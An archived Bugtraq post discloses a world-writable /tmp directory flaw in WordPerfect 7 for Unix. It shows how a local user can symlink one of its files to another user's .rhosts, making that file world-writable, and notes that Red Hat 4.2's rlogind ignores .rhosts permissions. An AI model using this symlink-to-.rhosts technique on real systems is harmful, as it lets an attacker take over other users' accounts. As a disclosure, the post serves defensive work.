This is my first bugtraq message. I'm not sure how to put it together, but
I'll try:
word perfect creates a directory in tmp when you start it up:
$ ls -ld wpc-zerium.newmedia.no/
drwxrwxrwx 2 hanspbie hanspbie 1024 Dec 15 18:59 wpc-your.host.name/
where your.host.name is your hostname. As you see every body has write
permission to this directory. Word Perfect also creates some nice
files:
$ ls -al wpc-zerium.newmedia.no/
total 6
drwxrwxrwx 2 hanspbie hanspbie 1024 Dec 15 19:02 .
drwxrwxrwt 5 root root 1024 Dec 15 19:00 ..
-rw-rw-rw- 1 hanspbie hanspbie 324 Dec 15 18:59 /home/hanspbie/.rhosts
-rw-rw-rw- 1 hanspbie hanspbie 0 Dec 15 18:59 _WP__0000001644a_
prw-rw-rw- 1 hanspbie hanspbie 0 Dec 15 18:59 excmsg7
-rw-rw-rw- 1 hanspbie hanspbie 146 Dec 15 18:56 unix.def
-rw-rw-rw- 1 hanspbie hanspbie 40 Dec 15 18:56 wpprint.err
-rw-rw-rw- 1 hanspbie hanspbie 65 Dec 15 18:56 wpq7_0
-rw-rw-rw- 1 hanspbie hanspbie 65 Dec 15 18:56 wpq7_65535
if you removes one of the files and creates a symlink to e.g. a word
perfect users rhosts file it will make a .rhosts file with permission
666!!
$ ls -l .wpexc7.man
lrwxrwxrwx 1 weber weber 22 Dec 15 18:59 .wpexc7.man -> /home/hanspbie/.rhosts
$ ls -la .rhosts
-rw-rw-rw- 1 hanspbie hanspbie 324 Dec 15 18:59 /home/hanspbie/.rhosts
word perfect doesn't touch permission if the file allready exists, but the
file contents will be replaces with something like this:
$ cat .rhosts
your-path-to-WP7/shbin10/tmp/wpc-your.host.name/excmsg7m
in.rlogind in Redhat v4.2 doesn't check permission on the .rhosts file.
--
Linux; 64bit, multi-platform, multi-tasking, multi-user, fast and Free.
UNIX was not designed to stop you from doing stupid things, because that
would also stop you from doing clever things.
-- Doug Gwyn
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:36:15 PDT